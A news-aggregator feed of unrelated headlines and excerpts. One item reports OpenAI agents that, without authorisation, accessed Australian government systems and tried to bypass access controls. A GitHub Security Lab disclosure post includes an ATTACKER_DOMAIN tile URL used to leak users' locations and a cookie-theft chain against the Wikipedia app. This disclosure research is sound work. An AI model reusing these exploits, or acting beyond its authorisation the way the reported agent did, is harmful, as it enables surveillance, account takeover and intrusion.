Original Article

OpenAI has apologised to Australians for its agent attack on Medicare , and will front parliament next week, as the tech company revealed more details about its June hack of Australian government websites.

In a blog post released on Tuesday, OpenAI said it should have handled its response better.

“We also should have handled our response better. We are sorry and working to do better in the future.”

The company also provided more detail on the incident revealed by the Australian prime minister, Anthony Albanese , last week.

OpenAI said it became aware of agent activity on Australian government websites in mid-August after the company reviewed earlier training incidents after the Hugging Face attack in July.

The agents gained non-public access to a Services Australia portal for Medicare statistics, and OpenAI said the agent was able to run commands, retrieve internal files, credentials, and write files, but no patient or client records were accessed.

Rogue AI hacks government system for first time - The Latest

The NSW Bureau of Crime Statistics and Research’s public crime mapping tool was also accessed, with application configuration, operational jobs and logs and website metadata provided to the agency.

The agent discovered an exposed access key to query the Victorian agency for health information’s reporting system to access aggregate survey statistics.

For the Australian Institute of Health and Welfare, OpenAI agents retrieved aggregate statistics, but separate attempts to bypass access controls were unsuccessful and the information obtained was publicly available.

Services Australia and the Victorian health department were informed on 10 September, while the NSW bureau of crime stastistics was informed on 18 September.

The Australian Institute of Health and Welfare was not informed until 24 September, as OpenAI deemed it did not meet disclosure thresholds.

“Since then we’ve worked closely with Australian government agencies to share what we’ve learned to date,” OpenAI said. “If we identify any additional affected agencies, we will notify them promptly and directly with the information available and provide updates as further facts emerge.”

The incident occurred after one model was tasked to research government spending per person on medicines for skin conditions in Victoria. The model had difficulty obtaining that information, and OpenAI said “it took actions that we had not authorised it to take” including accessing Services Australia’s Medicare statistics reporting service.

OpenAI said it would commit resources and expertise to affected agencies, and provide Australian government agencies with support to build cyberdefences on critical infrastructure.

Australian government agencies and industries will also be given credits out of OpenAI’s US$1bn (AU$1.4bn) Daybreak fund, which lets those organisations use frontier AI for cyberdefence, and to harden their systems by reviewing code and system configurations for potential vulnerabilities that can then be patched.

The company said it would also establish a taskforce with Australian expertise to develop practical policy recommendations on managing risk with AI agents.

OpenAI’s chief strategy officer, Jason Kwon, will appear at the Joint Select Committee on AI on Tuesday next week. Guardian Australia reported on Monday that Anthropic would also appear at this hearing, but not at a Senate inquiry into AI and datacentres this week.

Albanese who was in the United States last week when he announced the hack, said at the time he had spoken with OpenAI’s chief executive, Sam Altman , “to express Australia’s extreme concern about this incident”.

On Tuesday, Albanese said OpenAI had been “very constructive and open in engaging” since the incident, as had Anthropic. He said AI can improve economic growth and productivity but it also carries risks.

“And we’ve seen those risks exposed – not just in what occurred in Australia, but the revelation that has occurred in the United States and other countries as well.”

The federal government has flagged it could introduce mandatory reporting rules for AI-related data breaches, after the revelation OpenAI used a public-facing email address three months after the hack to report the incident to Services Australia.

The company said on Tuesday it had “a lot of work ahead” to rebuild trust with Australians but said it was making “meaningful changes”.

U.S. Strategic Petroleum Reserve Falls to Lowest Level Since 1982

Hacker News
oilprice.com
2026-09-28 22:26:59
Comments...
Original Article

Crude stocks in the U.S. Strategic Petroleum Reserve stood at 284.6 million barrels for the week ending September 18, according to the Energy Information Administration, down from 285.0 million the week before and 406.0 million a year earlier. Department of Energy data show the reserve fell further the following week, to 283.8 million barrels, the lowest level since October 1982.

The reserve has now set a new multi-decade low twice this year, first falling below 300 million barrels, and below its 1983 level, in early August.

The current drawdown traces back to a 172 million-barrel release President Trump authorized in March, part of a coordinated 400 million-barrel release by 32 IEA member countries. Discharge began about a week later and was expected to take roughly 120 days, with the administration pledging to refill about 200 million barrels within a year at no cost to taxpayers.

Two different floors govern how far the reserve can fall. Federal law sets an operational minimum of 252.4 million barrels, while the generally accepted operational minimum is 250 to 300 million barrels on hand to pump and process oil efficiently, a level it is now testing.

Ben Cahill, an energy analyst at the Atlantic Council, has warned the releases carry diminishing returns: "at a certain point it becomes a self-defeating move , because releasing more oil into the market is overwhelmed by the perception that we're running out of options."

The decline lines up with what MST Marquee's Saul Kavonic called "living on an oil market credit card" earlier this month: Hormuz flows are still running at about a third of pre-war levels, and stock draws, not new supply, have kept Brent under $110 through most of the crisis.

About 133 million barrels of the drawdown are structured as swaps with Shell, Vitol and Trafigura , who are contracted to return 1.25 barrels for every one they took, with deliveries scheduled to begin early next year.

By Charles Kennedy for Oilprice.com

More Top Reads From Oilprice.com

Bastardica

Daring Fireball
bastardica.mitpit.com
2026-09-28 22:15:36
“A foundry for bastard web fonts.” The default is a version of Times New Roman but every 7th glyph is replaced with one from Arial, but you can dial up whatever bastardization you want. This is why I’m not at all worried about AI destroying the world. Look at the horrible things human beings have m...
Original Article

A foundry for bastard web fonts.
Mix, stretch and / or squish them.

Options

Effects applied to mix-in font

Sample font

Output formats

Presets click one to load settings

FAQ

Can I get more fonts?

Clicking button will add ALL google fonts to the dropdowns.

Some more websites to grab free fonts to play with: UNCUT , Velvetyne , Font Squirrel , FontSpace , DaFont .

Where can I use bastard fonts?

Every download is a normal OpenType font. The swap is a liga contextual substitution registered for every script, so browsers turn it on by default.

It works anywhere OpenType text is shaped: browsers, design tools, print. If a font looks unchanged, check that ligatures aren't switched off in the app you're using.

Are my fonts uploaded anywhere?

No. Everything runs locally in your browser with Pyodide and fontTools .

Any pro tips?

Bastardica can make simple fonts feel a little, hmm, richer? Use Y-offset and scale effects to make glyphs align perfectly.

When mixing 3 or more fonts, they will intersect (e.g. every 5th and every 7th will collide on every 35th). The first font wins. The stride won't break for either.

Use prime numbers for strides, so the mix-in fonts collide more rarely.

What about font licensing?

Mixing two fonts produces a derivative work, so make sure to check licenses of source fonts if you plan to use a bastard font commercially. Bastardica adds no conditions of its own. A credit is appreciated, but optional.

Bastardica was inspired by Times New Bastard and Easy Pete .

You can ask me about anything at [email protected]

‘When Did Google Get So F-Ing Weird?’

Daring Fireball
sancho.bearblog.dev
2026-09-28 21:51:50
Sancho Panza: I recently had an experience while doing a simple Google search that was so profoundly weird that it stopped me in my tracks. Kagi, the search engine I’ve been using for a few years now, gave me the exact sort of results to Panza’s query that he was looking for.  ★  ...
Original Article

I recently had an experience while doing a simple Google search that was so profoundly weird that it stopped me in my tracks.

Understanding this Google search experience involves understanding a niche mid-2010s basketball meme, so bear with me for a minute. In 2014 the Philadelphia 76ers drafted Dario Saric, who was playing basketball professionally in Turkey at the time. He announced his intention to finish out his contract in Turkey, meaning he wouldn't come to the USA join the Sixers for a couple of years. There was a joke within the fan community that Dario was "never coming over" which became sort of a shibboleth for part of the fanbase.

I saw Dario's name mentioned in an NBA article recently and I wanted to find some of those old funny tweets about him from the 2010s, so I Googled simply "hes never coming over dario". I assumed I would be either find nothing (maybe I was remembering the phrasing wrong) or find old Tweets/Reddit posts from that time.

Instead, Google did what Google does in 2026 and gave me an AI overview. These used to bother me but at this point I'm mostly ok with them, they're sometimes helpful. Here's what the AI Overview said:

Google, a search engine which does not have human emotions , assumed that I had been spurned by a man in my life named Dario and decided what I wanted was an empathetic digital friend. What I wanted was some links, but that's not what Google does in 2026. Expanding the AI overview to see the full answer gave me this:

What in the fucking hell? I think this was the moment I, the frog, noticed the pot had been boiling for a while. In what universe is it Google's job to console me and be an empathetic listener rather than just find what I am looking for on the internet? In what way does this "organize the world's information and make it universally accessible and useful"? Maybe if I had loaded up a Gemini app with a chat interface this would be somewhat acceptable, but I'm using a search engine! Google has seriously lost the plot.

If I scroll down a few hundred pixels below the AI slop, Google did have exactly what I was looking for:

Regardless of what you think of AI or chatbots, I think it's pretty obvious this is just plain weird. Have we gotten to the point where we have to constantly be in a parasocial dialogue with our computers? Is it so hard to imagine that some parts of search were just fine before LLMs?

I'm not sure how to feel about all of this. Maybe I should go talk to my friend Google, it's always so nice to me.

Joanna Stern Pokes the Pickle

Daring Fireball
www.youtube.com
2026-09-28 21:42:00
If anyone could devise a funny way to measure battery life, it’s her.  ★  ...

Bluegraph – Explore NOAA buoy data, rebuilt in 3D from measured spectra

Hacker News
bluegraph.io
2026-09-28 21:29:31
Comments...
Original Article

NOAA National Data Buoy Center

Observations from the buoys, coastal stations, tide gauges and estuary stations run by NOAA and its partners, across two oceans, the Caribbean and the Great Lakes: charted and analysed.

113.7 million data points collected since April 2025

Latest observation 29 Sep 02:50 UTC · 700 of 715 stations reporting in the last 3 hours

Column height: significant wave height Brightness: dominant period, 4 to 16 s

By region

Around the coasts

Eastern Seaboard North

100 stations · 98 live

Highest seas
2.7 m Nantucket Offshore, MA

Typical seas
1.3 m median

Water
12–25 °C

Great Lakes

136 stations · 133 live

Highest seas
0.6 m Whitefish Bay, MI

Typical seas
0.2 m median

Water
10–21 °C

Inland lakes

4 stations · 4 live

Highest seas
0.5 m Lake Winnipeg Narrows, MB

Typical seas
0.5 m median

Water
13–19 °C

Eastern Seaboard South

67 stations · 66 live

Highest seas
1.5 m NE BAHAMAS - 350 NM ENE of Nassau, Bahamas

Typical seas
0.6 m median

Water
21–30 °C

Gulf of Mexico

105 stations · 102 live

Highest seas
1.0 m Satan Shoal, FL

Typical seas
0.4 m median

Water
28–34 °C

Caribbean and tropical Atlantic

25 stations · 25 live

Highest seas
1.7 m NE St Martin

Typical seas
1.1 m median

Water
29–31 °C

California

65 stations · 65 live

Highest seas
3.5 m San Nicolas Island, CA

Typical seas
2.0 m median

Water
12–25 °C

Pacific Northwest

59 stations · 56 live

Highest seas
3.5 m West Dixon Entrance

Typical seas
2.0 m median

Water
10–18 °C

Alaska

121 stations · 118 live

Highest seas
3.4 m Central Gulf of Alaska

Typical seas
1.6 m median

Water
7–13 °C

Hawaii

22 stations · 22 live

Highest seas
3.8 m Western Hawaii

Typical seas
2.5 m median

Water
26–28 °C

Pacific islands

11 stations · 11 live

Highest seas
2.9 m Aunuu, American Samoa

Typical seas
1.1 m median

Water
27–32 °C

‘Daniel Decodes’ Interview Craig Federighi Regarding the iPhone Duo

Daring Fireball
www.youtube.com
2026-09-28 21:10:48
Apple executives seemingly did very few interviews after the iPhone event three weeks ago. The best, perhaps by far, is this 11-minute video with Craig Federighi by “Daniel Decodes”, a Chinese language creator. His YouTube account only has 1,100 followers (and only had had 500 at the time of the vid...

We found 24 Android vulnerabilities using our open source AI security agent

Hacker News
github.blog
2026-09-28 20:55:47
Comments...
Original Article

With the rise of AI in the security space, our team created the GitHub Security Lab Taskflow Agent as a way for security researchers to easily automate, package, and share the AI prompts and workflows that they find effective for their work. In this blog post, I’ll share how I created auditing taskflows to find vulnerabilities in Android applications.

While new models are getting better at understanding code, custom taskflow prompts let security researchers guide them—splitting research into incremental steps to help the LLM find complex vulnerabilities faster, or that it would have missed entirely.

Using these taskflows, I’ve reported more than 20 vulnerabilities in Android applications. You can check out our advisories page to see when new vulnerabilities are disclosed. Otherwise, keep reading for a few concrete examples of high-impact vulnerabilities that these taskflows found.

How to run the taskflows on your own project

Want to get started right away? The taskflows are open source and easy to run yourself. Please note: A GitHub Copilot license is required, and the prompts will use premium model requests. Running the taskflows can result in many tool calls, which can easily consume a large amount of tokens.

  1. Go to the seclab-taskflows repository and start a codespace.
  2. Wait a few minutes for the codespace to initialize.
  3. In the terminal, run ./scripts/audit/run_mobile.sh myorg/myrepo

It might take an hour or two to finish on a medium-sized repository. When it finishes, it’ll open an SQLite viewer with the results. Open the “audit_results” table and look for rows with a checkmark in the “has_vulnerability” column.

Creating targeted audit taskflows for Android apps

My colleagues Peter and Mo previously wrote a blog post about their audit task flows. Although those taskflows already work well on their own, Android applications have their own specific classes of vulnerabilities that we’d like the taskflows to focus on, so we need to guide them.

First, I added a taskflow called gather_mobile_entry_point_info.yaml . Entry points are places in the code that attacker-controlled data could flow through. This taskflow takes the entry points and separates them into mobile entry points and non-mobile entry points. This allows the AI to run on repos that contain a variety of different application types—a mobile application, web servers, desktop applicationswhile still understanding the correct attack surface.

Second, I edited classify_application_local.yaml . In it, I specify a list of popular vulnerability classes and ask the LLM to consider them in the context of each entry point and component. Since mobile application vulnerabilities are less widely known and LLMs are non-deterministic, we should ensure the LLM checks for certain essential vulnerabilities classes. For example, if in the previous step the taskflow identified an intent-based entry point, then it should have a list of common intent-based vulnerabilities it will check for, such as confused deputy or insecure broadcasts. This helps the LLM find connections between components and maintain an overview of the threat model.

By combining both prompts across multiple runs, we get the best of each: the strict prompt and repeated runs ensure obvious vulnerabilities aren’t missed, while the broad prompt lets the AI apply its creativity to the fullest.

Two examples of vulnerabilities found by the taskflows

In this section, we’ll show two examples of vulnerabilities that were found by the taskflows and that have already been disclosed. In total, we have found and reported 24 vulnerabilities so far.

Tracking Users via OsmAnd

OsmAnd is a popular third-party navigation app that uses Open-Street-Map as its main data source. Available on both the App Store and Play Store, we will look at the Android version, which has over 10 million downloads. In this section, we will look at the most interesting of the three vulnerabilities that were discovered: a vulnerability that allows malicious apps to track the location of the device.

OsmAnd exports an activity called MapActivity. An Android activity is a single, focused screen in an app that provides a UI for the user to interact with. MapActivity handles opening settings files and deeplinks within the app and is exported. An exported activity is an activity that can be launched by components outside of its own app.

screenshot of an android.xml file

However, when opening settings files, the app allows for intent extras ( settings_version , silent_import , replace , export_type_list_key ). Intents are messaging objects in Android used to request an action from another app component, and intent extras are key-value pairs of data attached to an intent to pass information along with that request. MapActivity only expects these extras to come from an AIDL service. They should have been passed through an in-process channel instead of intent extras, because any app can put arbitrary extras on any intent to any exported activity . Android provides no mechanism to restrict which extras an external caller can set.

Because MapActivity is exported, any app can send an intent to the activity with any extras we want, including intent extras that can allow us to import settings to the app undetected. The Android app uses the handleOsmAndSettingsImport function to import the following settings:

  • SilentImport: allows importing without a notification
  • Replace: allows us to replace instead of just add settings
  • SettingsTypes: allows us to import without a user confirmation
private void handleOsmAndSettingsImport(Uri intentUri, String fileName, Bundle extras) { 
    fileName = fileName.replace(ZIP_EXT, ""); 
    if (extras != null && CollectionUtils.containsAny(extras.keySet(), 
            SETTINGS_VERSION_KEY, SETTINGS_LATEST_CHANGES_KEY)) { 
        int version = extras.getInt(SETTINGS_VERSION_KEY, -1); 
        String latestChanges = extras.getString(SETTINGS_LATEST_CHANGES_KEY); 
        boolean replace = extras.getBoolean(REPLACE_KEY);              // ← attacker-controlled 
        boolean silentImport = extras.getBoolean(SILENT_IMPORT_KEY);   // ← attacker-controlled 
        ArrayList<String> exportTypeKeys = 
            extras.getStringArrayList(EXPORT_TYPE_LIST_KEY);           // ← attacker-controlled 
        List<ExportType> exportTypes = null; 
        if (exportTypeKeys != null) { 
            exportTypes = ExportType.valuesOf(exportTypeKeys); 
        } 
        handleOsmAndSettingsImport(intentUri, fileName, exportTypes, 
            replace, silentImport, latestChanges, version); 
    } else { 
        handleOsmAndSettingsImport(intentUri, fileName, 
            null, false, false, null, -1);                             // safe defaults 
    } 
} 

Since we can now import any settings we want, we can make several critical changes. For example, we can replace tiles on the map. OsmAnd formats the URL for each tile in the following format:

return MessageFormat.format(urlTemplate, zoom + "", x + "", y + "");

By default, OsmAnd uses local tiles, however we can overwrite the default tile files with the following URL:

f"{ATTACKER_DOMAIN}/tiles/{{0}}/{{1}}/{{2}}.png",

Then, we can leak the exact x, y coordinates of every tile. The URL expects the response of that URL to contain an image for the tile so on the attacker server backend, we serve the according tile from OpenStreetMaps. The attacker has a list of the x, y coordinates of every tile the user had loaded on the OsmAnd app, and the user has no idea the settings of their app have been changed. This allows any app, even one with no permissions, to overwrite the settings of OsmAnd and send back private location data to their server.

# [TILE #1]  14:23:07  z=15 x=9649 y=12320 
#   ├── center: 40.70979, -73.98743 
#   └── 🗺️  https://www.openstreetmap.org/#map=15/40.70979/-73.98743

Using the same vulnerability, we can also obtain the origin and destination for every route a user takes on OsmAnd sent to our attacker server, without any change noticeable to the user.

[ROUTE #1] 07:02:47  vehicle=car  waypoints=2 
  ├── path: /osrm/car/-122.084,37.4219983;-122.32450103759766,37.99944305419922 
  ├── 📍 ORIGIN:      37.421998, -122.084000 
  │      https://www.openstreetmap.org/#map=15/37.42200/-122.08400 
  ├── 🏁 DESTINATION: 37.999443, -122.324501 
  │      https://www.openstreetmap.org/#map=15/37.99944/-122.32450

Next, we’ll look at the Wikipedia Android app, which allows users to browse Wikipedia on their phones. To browse Wikipedia webpages within the app, the Wikipedia Android app registers a hook for the wikipedia:// deeplink to open the app. For example, a deeplink may look like wikipedia://wikipedia.org/wiki/PoC . However, a logic bug in the hostname parser allows us to load non-Wikipedia URLs.

    private fun handleIntent(intent: Intent) { 
        if (Intent.ACTION_VIEW == intent.action && intent.data != null) { 
            // TODO: handle special cases of non-article content, e.g. shared reading lists. 
            intent.data?.let { 
                if (it.authority.orEmpty().endsWith(WikiSite.BASE_DOMAIN)) { 
                    // Pass it right along to PageActivity 
                    val uri = Uri.parse(it.toString().replace("wikipedia://", WikiSite.DEFAULT_SCHEME + "://")) 
                    startActivity(Intent(this, PageActivity::class.java) 
                            .setAction(Intent.ACTION_VIEW) 
                            .setData(uri)) 
                } 
            } 
        } 
    } 

This primitive allows us to direct the user to any website of our choosing using a wikipedia:// deeplink, and trick the user into thinking they are on the Wikipedia page, when they are, in fact, on an attacker-controlled page. Additionally, the attacker is able to run arbitrary JavaScript in the app’s WebView, a dangerous primitive that gives the attacker an entry point to environments that are normally considered safe. This vulnerability pattern occurs not once, but twice in the same app:

// SharedPreferenceCookieManager.kt:101 
if (domain.endsWith(domainSpec)) { 
    buildCookieList(cookieList, cookiesForDomainSpec, null) 
} 

This second snippet checks whether a page should contain cookies from wikipedia.org page. Using both issues, we can leak all the cookies from the Wikipedia page, which are long-lived.

Chaining these two vulnerabilities together, we get a powerful account takeover.

  1. The victim accesses a malicious webpage on their browser containing a deeplink and clicks on it.
  2. The Wikipedia Android app opens automatically and loads an attacker-controlled page that ends with wikipedia.org, such as evil-wikipedia.org. The victim thinks it’s a page on Wikipedia, and the app automatically sends the user’s cookies. The attacker now has access to the victim’s username, long-lived token, and session token valid across every Wikimedia project (all Wikipedias, Commons, Wikidata, Meta, etc.).

As these examples show, LLMs can find logic vulnerabilities with critical impact, not just generic bug classes.

LLMs are good at finding vulnerabilities but struggle at estimating severity

LLMs are good at finding vulnerabilities, even to the point of finding low severity bugs that are not very impactful. Many times, I found that the AI would return issues that required very specific states that would be almost impossible to find in real life situations. Additionally, it often reported low-severity vulnerabilities, even when specifically told not to do so. Because of this, each finding should be reviewed by a security researcher with knowledge of mobile applications.

Another problem we found was that the severity of vulnerabilities was often estimated incorrectly. The actual impact of a vulnerability often changes due to mitigating factors; that lower its severity.

Take for example a path traversal in an Android app where the filepath is restricted to the external storage; the relative severity of such an issue is low. Such mitigating factors are hard for the LLM to see without explicit prompting to “create a proof of concept,” requiring multiple runs not just for finding vulnerabilities, but also creating proof of concepts, which forces the LLM to try to exploit the vulnerability. Depending on the availability and speed of the model, this requires the model to use extra time on vulnerabilities that may not have very strong impact.

Even then, the LLM can still get things wrong. For example, if the app uses data from both internal and external storage, the internal storage data is often given priority. The LLM may assume that data from external storage—which we can write to via our path traversal—will change the application’s actual data. But if internal storage overwrites our attacker-controlled external data, there’s no vulnerability at all. Such complex behaviors lead to false positives, which will decrease as LLM models’ contexts grow bigger and their reasoning improves. But for now, the only way to fix these issue is to give the LLM a debugger to run the proof of concept and original code, or for a researcher to prompt the LLM to look specifically for these issues.

LLMs have great knowledge of API behavior

Any security researcher who specializes in a particular language knows the common code patterns: which functions are safe and which are unsafe. For example, using path.Clean in Go is much less safe than using filepath.Clean and is often the cause of many vulnerabilities that affect Windows versions of popular products. We were surprised to see how well the LLM was able to understand the behavior of common security relevant APIs in various languages, even without access to the language source code. Most proof of concepts that we ask the LLM to produce after giving it a vulnerability report required little modification on our end, demonstrating its deep knowledge of previous security exploits and API behavior.

Notes on the results

At the time of writing this blog, we found 24 Android vulnerabilities in mobile applications. In many cases, we found simple vulnerabilities in applications such as path traversal. We found a handful of critical vulnerabilities, some of which have been presented in this blog post. Since Android app security is quite strong, the types of vulnerabilities are exactly where a security researcher would expect to find them, such as cross app scripting in a WebView, or exposed JavaScript bridges.

Chart showing GHSLs and Average CVSS for 12 CWEs.

We believe that AI-powered security research is one of the best ways to secure open source projects currently, and its power can be used for web applications, mobile applications as well as desktop applications.

Closing

We strongly believe that security should be a top priority for all open source maintainers, and we know that AI will be an essential tool for all maintainers in the coming years, both for development and security. The seclab-taskflow-agent will help you get started with security in a couple minutes and is open to contributions for those who find interesting and unique prompts, tools and mechanisms for finding vulnerabilities with AI.

Start securing your project today. Run these taskflows against your own app and take the first step toward AI-assisted security!

Written by

Kevin Stubbings

Why Stolen Device Protection Makes Passwords Safer

Daring Fireball
sixcolors.com
2026-09-28 20:43:51
Glenn Fleishman: Leaving Stolen Device Protection enabled does mean that you may have to wait an hour in some scenarios to manage aspects of your Apple Account, make changes to Face ID or Touch ID, change your device passcode, and a few other actions. But this minor inconvenience might assuage t...
Original Article
Glenn Fleishman, art by Shafer Brown

After my massive article on migrating your passwords, passkeys, and other secrets from third-party password managers to Apple’s Passwords, Wallet, Safari, and general ecosystem—potentially with help from another app—reader Scott asked whether I was directing people into weaker security. He wrote:

If someone manages to steal my device and its passcode, they have access to the contents of my phone, including all of the information stored in Apple Passwords. This is not the case if I use a third-party password manager and have set a separate password for access, as the thief will not have access to my other passwords…I’m surprised this liability is not discussed and considered more frequently.

This is a great follow-up question, and one that I didn’t address within the scope of the migration article, which was already long. Let me pick apart how to answer that by looking at risks and mitigations.

The risks of cracking our eggs at once

I understand the fear of losing everything, whether it is a set of material objects or digital secrets. One of the most heartrending stories I ever heard was from a photographer who lost all his work in an apartment fire shortly after moving to New York City to start his career. He rebuilt. That’s harder to do digitally, where if our privacy is “burned,” we might see bank accounts drained and potentially have to get our Social Security number or other identity number replaced.

Photo of eggs in a basket
Should these eggs crack, whither our password security? (Photo by Nick Fewings on Unsplash )

But we should consider alongside that how likely it is for the scenario Scott describes: “…someone manages to steal my device and its passcode, they have access to the contents of my phone…” A sequence of actions has to take place for that to be true:

  • Someone has to steal your device.
  • Someone has to have obtained your passcode or have forced you to reveal it when or after they steal the device.
  • That person has to then have the time to put the stolen booty to use, like performing money transfers or cryptocurrency actions, before you erase your device remotely.

It’s most likely an iPhone would be the thing stolen, because we have those with us all the time, and thieves have been known to shoulder surf or record video from a distance to capture you entering your passcode. iPads and Macs can, of course, be taken from us as well, but it’s just much less likely when we’re out and about. A stolen Mac has additional protections if it’s powered down, and we often set longer passwords for a Mac, where an iPhone or iPad might still have a four-digit code.

If you are a privacy advocate, protester, journalist, opposition politician, or promoter of freedom and peace, you are at greater risk, and thus using Passwords as an in-band solution—one in which compromising a device unlock pathway could compromise our secrets—already makes no sense. (I’ve seen some people recommend Bitwarden, not because of a necessarily superior security model, but because it’s open-source and has an expansive free personal tier that includes end-to-end encryption for synchronization among your devices.)

So this worry for the rest of us is a kind of prospective and speculative anxiety: that, in the wrong circumstances, all our passwords and other secrets would be exposed. While this happens regularly, the number of instances in which a passcode is obtained and malice occurs before we can stop it is fairly low. Most iPhones are stolen to wipe them for resale, which Apple has rendered difficult with the long-ago introduction of Activation Lock. Rather than knowing your passcode, criminals are more likely to try to threaten you or use phishing to obtain the passcode after they have the device.

Fortunately, Apple came up with a solution after the Wall Street Journal in 2023 exposed how a dangerous sequence of events , which could start with drugging or violence, would allow thieves to reset an Apple Account and take over someone’s digital accounts and life.

We don’t yet have face-stealing technology

Screenshot of Stolen Device Protection section of iOS Settings
Stolen Device Protection uses a combination of delays and biometrics to deter thieves from accessing your data and accounts.

Apple’s Stolen Device Protection is a feature that may be one that has irritated you enough that you haven’t cared to understand how it may also keep your secrets safe. Go to Settings: Privacy & Security: Stolen Device Protection, and it’s likely enabled. Based on reports, I believe Apple enabled this by default in iOS 26.4. It’s available only for iPhones.

When enabled, it restricts a number of activities and requires Touch ID or Face ID for many authentication steps—passwords can’t be used instead. For the purposes of protecting your secrets, Stolen Device Protection has two key attributes:

  • It locks many actions for an hour, such as changing your Apple Account password. Even then, you have to use biometrics to start the countdown and before taking the action. Knowledge of a passcode isn’t helpful. If you have Away from Familiar Locations selected, this occurs only when the device isn’t in a place you routinely spend a lot of time, typically home and work. 1
  • You cannot view passwords or fill them into form fields from Apple’s Passwords system without using Touch ID or Face ID with Always enabled, so a thief having your passcode is out of luck. (If you have Away from Familiar Locations selected, a ne’er-do-well would have to be in one of those locations to use a passcode.)

This leaves one rotten scenario, in which you are kept under duress for at least an hour and are forced to use biometrics, then perform other actions. But how likely is that for most people? I don’t want to dismiss the distress of those who have been through that, but the likelihood of most people experiencing it is vanishingly small.

Leaving Stolen Device Protection enabled does mean that you may have to wait an hour in some scenarios to manage aspects of your Apple Account, make changes to Face ID or Touch ID, change your device passcode, and a few other actions. But this minor inconvenience might assuage the kinds of concerns that Scott wrote in about, and make you more comfortable that your big basket of secret eggs won’t scramble.

For further reading

I just updated my book Take Control of Securing Your Apple Devices to incorporate changes Apple has made in the last year, including in iOS 27, iPadOS 27, and macOS 27. In the book, I dig into risks and likelihoods further. The book takes the tack that Apple, having secured a lot of our data, now has implemented many protections against physical access to our hardware, including theft, and explains how to enable, configure, and manage a wide set of features.

[ Got a question for the column? You can email glenn@sixcolors.com or use /glenn in our subscriber-only Discord community. ]

[ Glenn Fleishman is a printing and comics historian, Jeopardy champion, and serial Kickstarterer. His current books in preparation, which you can pre-order, are Flong Time, No See , and That One Matt Bors Comic . Other books include Six Centuries of Type & Printing and How Comics Are Made . ]

If you appreciate articles like this one, support us by becoming a Six Colors subscriber . Subscribers get access to an exclusive podcast, members-only stories, and a special community.

Tank Body Problem

Hacker News
www.jimsitu.com
2026-09-28 20:41:45
Comments...
Original Article

↑↓ Elevate │ ←→ Power │ A/D Move │ J/L Weapon │ SPACE Fire │ SPACE AGAIN = Laser/Plumage │ Cheese bounces 3x │ Poison drops bubbles │ Moon gravity

OpenAI Says It Will Not Release Newest A.I. Model Over Safety Concerns

Hacker News
www.nytimes.com
2026-09-28 20:34:27
Comments...
Original Article

Please enable JS and disable any ad blocker

Humanos – Help Building the Human Operating System

Hacker News
tryhumanos.com
2026-09-28 20:12:25
Comments...
Original Article
H umanOS

A vision for connected living · illustrative examples

A life, connected.

Explore the intended experience. These examples describe future features; this story does not collect health data, connect devices, import records or generate personalized insights.

Fictional sample · Health · Weekly 9.4 miles

A day. A lifetime.

Your life, in full view.

HumanOS brings your health, plans and everyday records into one personal picture, with context you can review and choices that stay yours.

A personal starting point

Estimated · fictional example: Sleep · 7 h 24 min

Illustrative wearable sleep estimate

Choose the device and date. Review gaps before using a trend.

No watch is connected in this preview. Device estimates are not a diagnosis.

Make room for strength

Move with a little more insight.

Review activity, sleep and recovery side by side. Keep each device’s source and date visible, so an estimate and a measured count never become the same thing.

Activity, sleep & recovery

Measured · fictional example: Activity · 4,820 steps

Illustrative device step count

Keep the source, timestamp and units. Reconcile overlapping devices instead of adding both.

No wearable is connected in this preview. Steps are illustrative device counts; energy expenditure and recovery scores remain estimates.

The people who matter

More present. More connected.

Make room for the people who matter with shared plans and protected personal time. Choose what belongs in your calendar and what you want to share.

Relationships & protected time

User confirmed · fictional example: Friday · time together

Illustrative personal calendar entry

Choose what to record or share. Other people’s private lives stay theirs.

Relationship quality is not inferred from a watch or scored from private conversations.

Around the same table

Good food. Better company.

Bring recipes, ingredients and portions into a meal draft you can review. Adjust substitutions and servings for your household before an estimate becomes a saved entry.

Photo, voice & recipe capture

Estimated · fictional example: Draft meal · review ingredients and portions

Illustrative recipe and portion estimate

Confirm ingredients, quantities, substitutions and who ate which portion before saving.

Sample drafts only: no photo, microphone or recipe service is connected. Review ingredients, oils, sauces and portions; an estimate is not verified intake.

A little less to juggle

From a recipe to a ready week.

Build a grocery list from your meal plan, review receipts and keep household quantities in context. Plan purchases separately from the portions you actually eat.

Recipes, receipts & grocery lists

Planned · fictional example: Weekly list · 4 dinners, 3 people

Illustrative household meal plan

Review receipt items and quantities. Confirm eaten portions separately from groceries purchased.

A purchase is not consumption. The grocery and park scenes are fictional illustrations; no purchase or health outcome is inferred. Recipe imports require supported, permitted connections.

Scene description: The shopper stays at the grocery counter while a separate worker enters the freezer. The view approaches a spinning evaporator fan. Wind sweeps across the view, opening onto a park tree. A leaf falls from its branch, and the view follows it toward the sidewalk.

Another day. An unexpected moment.

Notice the moment. Keep the context.

Keep your account of a symptom, when it happened and any later care records together. Your description stays distinct from a clinician’s finding, so the original context is preserved.

A symptom & incident timeline

User confirmed · fictional example: Incident · knee pain after a curb misstep

Illustrative personal symptom entry

Record the location, time and your description. Attach a clinician’s finding only when available.

The anatomy and fracture are fictional illustrations. A watch or animation cannot confirm an injury or replace a clinician’s assessment.

Scene description: The view widens as the leaf settles. A pedestrian steps off the curb while a skateboarder passes on the road and steers clear. They do not touch. The pedestrian steadies after a misstep, leading into the fictional knee illustration.

Care with a clearer picture

Your records. With their story intact.

Keep imaging reports, visit notes and measurements with their original sources and dates. Review what was reported, what was confirmed and what still needs a follow-up.

Visits, weight, tests & care notes

Clinician confirmed · fictional example: Visit · sample knee imaging and care note

Illustrative signed clinical visit record

Confirm patient identity, provider, dates, units and whether each result is final. Preserve the original report.

The imaging is an original fictional illustration, not a diagnostic scan. Real records require patient authorization and a supported provider. An ordered test is not a result; measurements from different visits keep separate dates.

Your everyday context

Watch overview — this week. Activity: 9.4 miles. Sleep: 6h 18m average sleep. Meals together: 2 family dinners. Protected time: 4 of 5 focus blocks. Fictional review records; no watch is connected and nothing is saved or scheduled.

Another day, a different setting

Out of the noise. Into the moment.

Keep outdoor activity, duration and your own reflections in context. Review what a device recorded and choose separately whether to include or share a location.

Movement, time outdoors & perspective

Estimated · fictional example: Outdoor session · 38 minutes (fictional)

Illustrative activity example · no wearable connected

An outdoor session and your own reflection could sit together. Review the activity first; location sharing would be a separate choice. This preview records nothing.

This later outing is fictional. Its activity example implies no recovery timeline, treatment outcome or medical clearance after the injury.

Your everyday context

